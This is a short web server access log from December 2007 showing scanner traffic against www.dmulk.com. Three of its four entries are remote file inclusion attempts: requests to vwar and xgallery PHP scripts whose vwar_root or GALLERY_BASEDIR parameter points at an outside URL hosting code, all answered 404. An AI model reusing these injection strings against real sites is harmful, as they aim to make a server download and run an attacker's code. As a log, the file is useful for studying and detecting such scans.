89.111.173.115 - - [22/Dec/2007:01:52:14 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.115 - - [22/Dec/2007:01:52:14 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.82 - - [22/Dec/2007:02:02:20 -0800] "GET /logs/access_070905.log HTTP/1.0" 200 42196 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.201.240.41 - - [22/Dec/2007:02:03:39 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://compaas.000webhost.org/tools/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
